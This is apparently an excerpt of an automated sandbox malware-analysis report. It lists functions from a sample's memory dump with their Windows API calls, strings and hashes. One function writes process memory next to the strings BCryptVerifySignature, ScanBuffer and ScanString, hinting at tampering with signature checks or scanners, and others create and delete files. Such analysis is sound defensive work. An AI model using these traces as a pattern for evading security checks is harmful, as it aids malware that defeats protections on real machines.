FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A

Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74

Strings

BCryptVerifySignature, xrefs: 02B987C7
bcrypt, xrefs: 02B987B3

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 0bea23942aea87216841285a5e6e1b1da5fbaf5cdb60f3508c492c187a9c2d49
Instruction ID: 84cd771f6ba0f28fc70c2bcfcc91237e7cb19730c5a9ea82ae58ce33788c9fff
Opcode Fuzzy Hash: 0bea23942aea87216841285a5e6e1b1da5fbaf5cdb60f3508c492c187a9c2d49
Instruction Fuzzy Hash: F6F04471A91254FEEF10AF6CA845BB6739CD746395F2089B9F10D8B984C7705C50CB60

Function 02B9DACC Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA

RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DB9E), ref: 02B9DB0B
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B9DB45
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B9DB72
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B9DB7B

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: File$AllocCloseCreateStringWrite
String ID:
API String ID: 3308905243-0
Opcode ID: ef6a40ba2f16e473eebded45b009db5efe4eaf50d30564eb835dc0ba84b5220e
Instruction ID: 4c09621d0b36204d73890984c43506b9198a8dba053bfccdbf173aea4a719bf6
Opcode Fuzzy Hash: ef6a40ba2f16e473eebded45b009db5efe4eaf50d30564eb835dc0ba84b5220e
Instruction Fuzzy Hash: 0721BC71A40209BEEB10EAA4CD46F9EB7BDAB05B04F6144A1B704F71D0D7B46A048AA5

Function 02B9D9F0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
NtDeleteFile.NTDLL(?), ref: 02B9DAA1

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: DeleteFileInitStringUnicode
String ID:
API String ID: 3559453722-0
Opcode ID: 9f9d0a2dd6907f8f4fa19183ccd533d484cbe1667d02b26049347376f8ffe51a
Instruction ID: 859238d7f6a49cac07242152b1ddf267ee39bfe1f41face0a37b1a6aec37dece
Opcode Fuzzy Hash: 9f9d0a2dd6907f8f4fa19183ccd533d484cbe1667d02b26049347376f8ffe51a
Instruction Fuzzy Hash: 8B014B75A0824AAEEF05FAA1CD81BCD77B9AB45704F5044E2E324F7091DA74AB148B25

Function 02B9DA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA

RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
NtDeleteFile.NTDLL(?), ref: 02B9DAA1

Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: String$AllocDeleteFileFreeInitUnicode
String ID:
API String ID: 2841551397-0
Opcode ID: 8d7d4e99c2a9d409aabd3a9bab9d43f47259409cc5e42c6df8f2b3839e6b5afa
Instruction ID: f38f1d291bb24399c9ca2f4a515438841b77be2ca70569558a0df89cd848262f
Opcode Fuzzy Hash: 8d7d4e99c2a9d409aabd3a9bab9d43f47259409cc5e42c6df8f2b3839e6b5afa
Instruction Fuzzy Hash: CA01E871A0420DAAEB11FAE1CD52FDEB7BDEB49700F5045B1E614E2190EB74AB148A64

Function 02B87F5A Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B87F7D

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
Instruction ID: b1f63745ac3f3c722d64e7c101b13e3215ace84cf0114bf9c2738571bfccfa55
Opcode Fuzzy Hash: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
Instruction Fuzzy Hash: 7C11C0B5A00209AFDB04DF99CD819EFF7F9EFC8704B14C569A509EB254E6719A01CB90

Function 02B8A74C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
Instruction ID: 0d2da3e715386df9dc3f847760234b00ef292f80ff2195287f8744c0f78bb985
Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
Instruction Fuzzy Hash: B2E0923570021417D311B5585C80AEAB3AD9758310F0041AAA90CC7341FEA09D408AE8

Function 02B8B714 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02BAC106,00000000,02BAC11E), ref: 02B8B722

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: b55ecf5c71a4d3b20c721b975d93d8133e4585ecbfce8983f5b675dc26f2bdc8
Instruction ID: 6ed1f1a30976d67122a7252295a0808533abcfdbd2e49e9b1844f7d1f51d011c
Opcode Fuzzy Hash: b55ecf5c71a4d3b20c721b975d93d8133e4585ecbfce8983f5b675dc26f2bdc8
Instruction Fuzzy Hash: 8EF0D4789443029FD358EF28D542A2977E5FB49B94F8089A9E898C7780E734D824CF52

Function 02B8A798 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B8BDFA,00000000,02B8C013,?,?,00000000,00000000), ref: 02B8A7AB

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
Instruction ID: 6360eb046ed9bbe6610f0eb93b80c417d709762e4dd0583c7a35c0a0dd1e9c1b
Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
Instruction Fuzzy Hash: 54D05BBA30D1502AA210615A1D54D7B5BECCBC5761F00447EF54CC6240D2008C06D6B1

Function 02B89194 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02B89198

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
Instruction ID: 403bb07b511902f02fbf32892024513a148737767c0b597a6c10b1a2eb730c68
Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
Instruction Fuzzy Hash: BBA01100808820028A803B280C022BA3288AA00A20FC80F80A8FC802E0EE2E022080E3

Function 02B820C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02B8D21C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B8D225

Part of subcall function 02B8D1F0: GetProcAddress.KERNEL32(00000000), ref: 02B8D209

Strings

VarXor, xrefs: 02B8D325
VarNot, xrefs: 02B8D25F
VarBstrFromCy, xrefs: 02B8D3D5
VarCyFromStr, xrefs: 02B8D3A9
VarR8FromStr, xrefs: 02B8D37D
VarNeg, xrefs: 02B8D249
VarCmp, xrefs: 02B8D33B
VarDiv, xrefs: 02B8D2B7
VarMul, xrefs: 02B8D2A1
VarSub, xrefs: 02B8D28B
VarMod, xrefs: 02B8D2E3
VariantChangeTypeEx, xrefs: 02B8D233
oleaut32.dll, xrefs: 02B8D220
VarBstrFromDate, xrefs: 02B8D3EB
VarDateFromStr, xrefs: 02B8D393
VarAnd, xrefs: 02B8D2F9
VarIdiv, xrefs: 02B8D2CD
VarAdd, xrefs: 02B8D275
VarR4FromStr, xrefs: 02B8D367
VarI4FromStr, xrefs: 02B8D351
VarOr, xrefs: 02B8D30F
VarBoolFromStr, xrefs: 02B8D3BF
VarBstrFromBool, xrefs: 02B8D401

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 859a03762879c292248a6806b20714254ec03d78839f598d09ee51ed6dd78622
Instruction ID: 5d0058bb072be7f11b8899b0803b4776b98f9683d2e4da29af0d0df4d3185def
Opcode Fuzzy Hash: 859a03762879c292248a6806b20714254ec03d78839f598d09ee51ed6dd78622
Instruction Fuzzy Hash: D9418CA3A942469A5A087A7D78009377B9ADB88B50364459BB44CCF7C6DD30AC91CE3D

Function 02B96E60 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B96E66
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B96E77
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B96E87
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B96E97
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B96EA7
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B96EB7
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B96EC7

Strings

CoInitializeEx, xrefs: 02B96E81
CoSuspendClassObjects, xrefs: 02B96EC1
ole32.dll, xrefs: 02B96E61
CoResumeClassObjects, xrefs: 02B96EB1
CoAddRefServerProcess, xrefs: 02B96E91
CoReleaseServerProcess, xrefs: 02B96EA1
CoCreateInstanceEx, xrefs: 02B96E71

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: cbbb91387027846a232fad756612048bdadd3398764de36bd98641b2dd641a1f
Instruction ID: 16742a2e6317a71aab61223cb5fb84c5ed88a992aafd58b23443e166279f5b69
Opcode Fuzzy Hash: cbbb91387027846a232fad756612048bdadd3398764de36bd98641b2dd641a1f
Instruction Fuzzy Hash: 5DF050B0A897526EBB007F70DCC2EA73B5D971068471019F5F51B56D22DAB48C108F60

Function 02B82530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B828CE

Strings

bytes: , xrefs: 02B8275D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B82849
An unexpected memory leak has occurred. , xrefs: 02B82690
String, xrefs: 02B827A1
, xrefs: 02B82814
Unknown, xrefs: 02B8278C
The unexpected small block leaks are:, xrefs: 02B82707
Unexpected Memory Leak, xrefs: 02B828C0
7, xrefs: 02B826A1

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 000c5c3ef80f888f51078a05e0bbcdeca7d8b7ea28fe539fa763b105420fac46
Instruction ID: cc9acdcbb7a52f591403a0d3eb9a1f11348f33f3bd1196dd8041ca1c798c6d4d
Opcode Fuzzy Hash: 000c5c3ef80f888f51078a05e0bbcdeca7d8b7ea28fe539fa763b105420fac46
Instruction Fuzzy Hash: 8EA1E030A042E48BDF21BA2CCC84BD9B6E5EB09750F1441E5ED4DAB386CB7599C5CF51

Function 02B8252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

bytes: , xrefs: 02B8275D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B82849
An unexpected memory leak has occurred. , xrefs: 02B82690
, xrefs: 02B82814
The unexpected small block leaks are:, xrefs: 02B82707
Unexpected Memory Leak, xrefs: 02B828C0
7, xrefs: 02B826A1

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 53696ce3e54dfd0197f7c9892426ec35260cea45545be7c2126b7a9ac19ae4bb
Instruction ID: 5287417ca808ddfeff90118f553c6ed405c537c187686baa2bcbac8853537036
Opcode Fuzzy Hash: 53696ce3e54dfd0197f7c9892426ec35260cea45545be7c2126b7a9ac19ae4bb
Instruction Fuzzy Hash: 5B71C034A042D88FEF21BA2CCC84BD9BAE5EB09740F1041E5E94DEB281DB758AC5CF51

Function 02B8BD48 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02B8C013,?,?,00000000,00000000), ref: 02B8BD7E

Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A

Strings

:mm:ss, xrefs: 02B8BFCE
AMPM , xrefs: 02B8BFA1
mmmm d, yyyy, xrefs: 02B8BE7A
m/d/yy, xrefs: 02B8BE4D
AMPM, xrefs: 02B8BF92
:mm, xrefs: 02B8BFB1

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 0112cd8a0600c2f5f8463af608924ab94a1c249eef71fab711c2567a4f43b4a7
Instruction ID: c5fa57966ade0b56cb1a458e1b7017eb423cfe53864a923d7e3de9709bfc1ab0
Opcode Fuzzy Hash: 0112cd8a0600c2f5f8463af608924ab94a1c249eef71fab711c2567a4f43b4a7
Instruction Fuzzy Hash: D0618F39B001499BDB05FBB4D890ADFBBBBDF88340F5098F6E119AB641DA34D905DB60

Function 02B9AE20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AE40
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B9AE57
IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AEEB
IsBadReadPtr.KERNEL32(?,00000002), ref: 02B9AEF7
IsBadReadPtr.KERNEL32(?,00000014), ref: 02B9AF0B

Strings

KernelBase, xrefs: 02B9AE52
LoadLibraryExA, xrefs: 02B9AE4D

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

